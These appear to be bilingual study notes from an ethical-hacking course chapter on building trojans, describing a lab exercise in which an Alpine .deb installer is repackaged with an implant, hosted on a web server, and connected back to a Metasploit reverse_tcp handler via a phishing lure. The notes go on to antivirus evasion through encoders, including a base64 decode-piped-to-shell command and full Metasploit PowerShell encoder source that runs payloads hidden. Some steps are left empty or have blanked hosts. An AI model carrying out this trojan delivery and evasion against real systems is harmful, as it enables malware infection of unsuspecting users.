Ethical.Hacking.2021.10：BUILDING TROJANS

回顾：

metasploitframe 反射过程

msfvenom生成代码命令

---

Hiding an Implant in a Legitimate File

We’ll execute a similar attack here by sending a phishing email
encouraging a victim to download an updated version of the company’s email client,
Alpine, from a fake site. You’ll execute this attack on the Ubuntu desktop machine in
your virtual environment. Let’s begin by creating the Trojan.

We’ll create our trojan by modifying the Alpine installer, the .deb file, so that it
installs the implant as well as Alpine. Download the legitimate Alpine installer by
running the following command:

kali@kali:~/Desktop/Malware/trojans/$ apt-get download alpine

 extract the contents of the file to the mailTrojan folder by running the following command:

kali@kali:~/Desktop/Malware/trojans/$ engrampa  -e mailTrojan

Editing Your.deb File

You’ll need to edit the Alpine installer’s .deb installation file so that it includes your
malicious implant, so let’s walk through the installer’s structure. All installation files must
contain a DEBIAN folder, which contains the files that describe the program and how to
install it. The installation file can also contain other folders such as var for files or usr for
binaries. These folders are copied to a location relative to the /home directory during
installation. For example, the installer would copy the usr folder to /home/usr. The
installer then will read the contents of the DEBIAN folder.

---

 Adding the Implant

 

repackage your files into your final .deb installation file. 

---

Hosting the Trojan（托管特洛伊木马）

kali@kali:~/Desktop/Malware/trojans$ sudo python3 -m http.server 80

Next, you’ll need to start the attacker server that will listen for connections from your
implant. 

kali@kali:~$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/
x86/meterpreter/reverse_tcp; set LHOST ; set LPORT
8443; run; exit -y“

Downloading the Infected File

访问：http:///mailTrojan.deb   下载安装略

how to design your own backdoor. But if you want to install one now, consider using the dbd backdoor designed by Kyle Barnthouse and available at https://github.com/gitdurandal/dbd/.

---

---

Evading Antivirus by Using Encoders

You can see which antivirus software will detect your implant by uploading it to Virus Total at
https://www.virustotal.com/gui/.

Antivirus systems use signature detection to attempt to find malware. A malware’s
signature is a unique sequence of bytes that represents it. You can see our malicious
implant’s byte sequence by running the xxd command:

kali@kali:~/Desktop/Malware$ xxd malicious

Encoders change a program’s signature by modifying its bytes without changing its functionality. 

编码器通过修改程序的字节而不改变其功能来更改程序的签名。

启动msf：

sudo msfdb init && msfconsole

msf6 > show encoders 

The base64 Encoder
 

The powershell_base64 encoder uses the base64 encoding scheme, which converts
binary sequences to text, just like the ASCII encoding scheme mentioned in Chapter 5.
However, unlike ASCII, which converts 8-bit sequences, the base64 encoder converts
6-bit sequences to one of 64 possible printable characters. 

converts the Linux ls command from ASCII to base64.

The last section has only four bits, so the remaining two bits are assumed to be 0,
and the padding character (=) is added to the end. Here is the base64encoded result:
bHM=.

we decode it and pass it to the shell

base64 -d <<< bHM= | sh 

base64 --help          
用法：base64 [选项]... [文件]
使用 base64 编码/解码文件或标准输入输出。

如果没有指定文件，或者文件为"-"，则从标准输入读取。

必选参数对长短选项同时适用。
  -d, --decode          解码数据
  -i, --ignore-garbag   解码时忽略非字母字符
  -w, --wrap=字符数     在指定的字符数后自动换行(默认为76)，0 为禁用自动换行
 

举例：

A Bash script containing the ls command will have a different signature from a file
containing base64-encoded values of the base64 -d <<< bHM= | sh command, even though
they are functionally equivalent. This is because both files are stored using ASCII
encoding. Because the signatures are different, an antivirus program may fail to detect
the malicious file containing the base64 values, as described in Figure 10-8

 

 polymorphic 多态的

Writing a metasploit Module

参考：

view the cmd/powershell_base64 encoder by visiting

metasploit-framework/powershell_base64.rb at master · rapid7/metasploit-framework · GitHub

This encoder is used to encode PowerShell scripts for Windows machines.

##
# This module requires metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class metasploitModule < Msf::Encoder
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Powershell base64 Command Encoder',
      'Description'      => %q{
        This encodes the command as a base64 encoded command for powershell.
      },
      'Author'           => 'Ben Campbell',
      'Arch'             => ARCH_CMD,
      'Platform'         => 'win')
  end


  #
  # Encodes the payload
  #
  def encode_block(state, buf)

    # Skip encoding for empty badchars
    if state.badchars.length == 0
      return buf
    end

    if (state.badchars.include? '-') || (state.badchars.include? ' ')
      return buf
    end

    cmd = encode_buf(buf)

    if state.badchars.include? '='
        while cmd.include? '='
          buf << " "
          cmd = encode_buf(buf)
        end
    end

    cmd
  end

  def encode_buf(buf)
    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
    cmd = "powershell -w hidden -nop -e #{base64}"
  end
end